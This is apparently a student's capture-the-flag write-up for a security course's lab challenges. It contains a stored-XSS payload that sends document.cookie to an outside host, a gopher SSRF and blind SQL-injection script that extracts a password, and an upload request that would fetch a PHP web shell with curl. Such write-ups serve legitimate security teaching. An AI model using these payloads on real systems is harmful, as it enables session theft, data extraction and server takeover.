SCIST mid writeup

#SCIST#nckuctf#writeup

Eason

Mid-term writeup for the security course

Maze 3D

Challenge

There is an (x, y, z) maze; you have to walk from (1,1,1) to (12,12,12).

Solution

Too lazy to write a DFS, so I played it by hand:

```python
from pwn import *

r = remote("lab.scist.org", 10309)

r.recvuntil(b"> Command: ")
r.sendline(b"start")
r.recvuntil(b"> Downward")

# current position, starting at (1, 1, 1)
nlx = 1
nly = 1
nlz = 1

# effect of each direction on (x, y, z)
MOVES = {
    "Left": (-1, 0, 0),
    "Right": (1, 0, 0),
    "Forward": (0, 1, 0),
    "Backward": (0, -1, 0),
    "Upward": (0, 0, 1),
    "Downward": (0, 0, -1),
}


def walk(nldir: str) -> bool:
    """Send one move; update the tracked position only if the server reports success."""
    global nlx, nly, nlz
    r.recvuntil(b"> Controller input: ")
    r.sendline(nldir.encode())
    res = r.recvuntil(b".").decode()
    if "success" not in res:
        return False
    dx, dy, dz = MOVES[nldir]
    nlx += dx
    nly += dy
    nlz += dz
    return True


while True:
    raw: str = input("Which direction? ")
    # anything that is not x-/x+/y+/y-/z+ falls through to Downward (z-)
    nldir = "Downward"
    if "x-" in raw:
        nldir = "Left"
    if "x+" in raw:
        nldir = "Right"
    if "y+" in raw:
        nldir = "Forward"
    if "y-" in raw:
        nldir = "Backward"
    if "z+" in raw:
        nldir = "Upward"
    print("success" if walk(nldir) else "fail")
    print("(", nlx, ", ", nly, ", ", nlz, ")")
    if nlx == 12 and nly == 12 and nlz == 12:
        break

r.interactive()
```

xsser

Challenge

A text sharing platform; the backend views your post with Selenium.

Solution

Enter the following text:

```html
<img src='
'onerror='/*
*/fetch(`https://ctf.easonabc.eu.org/${document.cookie}`)'&gt;a
```

requestor

Challenge

A curl requester plus an endpoint with SQL injection (the remote socket address must be 127.0.0.1).

Solution

Use gopher:

  1. Build a POST request.
  2. Convert the line endings to \r\n and URI-encode it.
  3. Prepend gopher://127.0.0.1:5000 and URI-encode it again.
  4. Put it onto http://lab.scist.org:20002/ and send it.

SQL injection

A half brute-force

The ' is easy to break out of; then find a package to escape the special characters for you and look the password up with LIKE 'prefix%'.

Pitfalls encountered

At first I used escapeSql to escape the special characters, but it did not seem to escape correctly?, so I had to use ' OR hex(password) LIKE '${convertToHex(prefix)}% instead.

Code

```typescript
const DICT = "~!@#$%^&*()_+{}|:\"?><`-=[]\\;,./'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

class InjectRequest {
  payload: string;
  constructor(inject: string) {
    // Stage 1: URI-encode the injected value so it survives form decoding on the target.
    const stage1 = encodeURI(inject);
    const body = `username=admin&password=${stage1}`;
    // Stage 2: the raw HTTP request that gopher will deliver to 127.0.0.1:5000.
    const stage2 = `POST http://localhost:5000/admin HTTP/1.1
host: localhost:5000
Connection: close
Content-Length: ${body.length}
Origin: https://localhost:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

${body}`;
    // Stage 3: encode once for gopher and turn every LF into CRLF so the target sees
    // proper HTTP line endings (the replacement has to run on the encoded form, and
    // on every newline rather than only the first).
    const gopher = "gopher://127.0.0.1:5000/_" + encodeURI(stage2).replace(/%0A/g, "%0D%0A");
    // Stage 4: encode once more for the requester, which decodes the URL before curl fetches it.
    this.payload = "http://lab.scist.org:20002/@" + encodeURI(gopher);
  }
  async send(): Promise<string> {
    // Do not re-encode here; the payload is already fully encoded and send() may run more than once.
    const res = await fetch(this.payload);
    return await res.text();
  }
  static async start_with(prefix: string): Promise<string> {
    // hex() keeps quotes and the LIKE wildcards % and _ out of the guessed prefix.
    const req = new InjectRequest(`' OR hex(password) LIKE '${convertToHex(prefix)}%`);
    return await req.send();
  }
}

function convertToHex(str: string): string {
  let hex = "";
  for (let i = 0; i < str.length; i++) {
    // always two hex digits per character (the flag is ASCII)
    hex += str.charCodeAt(i).toString(16).padStart(2, "0");
  }
  return hex;
}

let prefix = "SCIST{";

async function main() {
  // Extend the prefix one character at a time until the closing brace is found.
  while (!prefix.endsWith("}")) {
    let found = false;
    for (const item of DICT) {
      const res = await InjectRequest.start_with(prefix + item);
      if (res.endsWith("admin")) {
        prefix += item;
        found = true;
        break;
      }
    }
    if (!found) {
      console.warn("no valid candidates");
      break;
    }
  }
  console.log(`FLAG: ${prefix}`);
}

main();
```
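To show the prefix oracle end to end, here is an added example (not from the original writeup) that runs it against a constructed in-memory SQLite table: the string-formatted login query the attack relies on sits next to a parameterised one, and the same hex(password) LIKE payload extracts the password from the first and nothing from the second. The table, the sample flag value and the function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the challenge's admin table (assumed schema and flag value).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'SCIST{h3x_l1k3}')")

DICT = "~!@#$%^&*()_+{}|:\"?><`-=[]\\;,./'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def login_vulnerable(username, password):
    """String-formatted query: the password value becomes part of the SQL text."""
    q = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"
    row = conn.execute(q).fetchone()
    return row[0] if row else None


def login_safe(username, password):
    """Parameterised query: the same bytes are compared as a plain string value."""
    q = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(q, (username, password)).fetchone()
    return row[0] if row else None


def oracle_payload(prefix):
    # hex() sidesteps both quoting and the LIKE wildcards (% and _) in the guessed prefix;
    # SQLite's LIKE is case-insensitive for ASCII, so lowercase hex still matches hex()'s output.
    return "' OR hex(password) LIKE '" + prefix.encode().hex() + "%"


def extract_password(login, max_len=64):
    """Grow the prefix one character at a time while the login oracle keeps answering 'admin'."""
    prefix = ""
    while not prefix.endswith("}") and len(prefix) < max_len:
        for ch in DICT:
            if login("admin", oracle_payload(prefix + ch)) == "admin":
                prefix += ch
                break
        else:
            return prefix  # no candidate matched: the oracle is closed or the charset is wrong
    return prefix
```

Against login_safe the loop stops on the first round, because the whole payload is compared as a literal password.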

uploader

I did not manage to solve this one.

Challenge

A site that lets you upload a PNG. The image must not be too small, but if it is big enough the request times out. I opened a ticket and it was closed, so I don't know whether that is the intended behaviour?

My idea

Use an image viewer such as GNOME's, open the metadata, put the text <?php system('curl https://url/to/your_shell.php -o somewhere') into any field, rename the file, and upload it.

Roughly like this:

```http
POST http://lab.scist.org:20000/ HTTP/1.1
host: lab.scist.org:20000
Connection: keep-alive
Content-Length: 539
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://lab.scist.org:20000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWYka0TB7biLOEKCR
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://lab.scist.org:20000/
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b7d9a1fe7d0cc684bd61de13de47aded

------WebKitFormBoundaryWYka0TB7biLOEKCR
Content-Disposition: form-data; name="file"; filename="output.php"
Content-Type: image/png

‰PNG
```

And then you would have a PHP shell.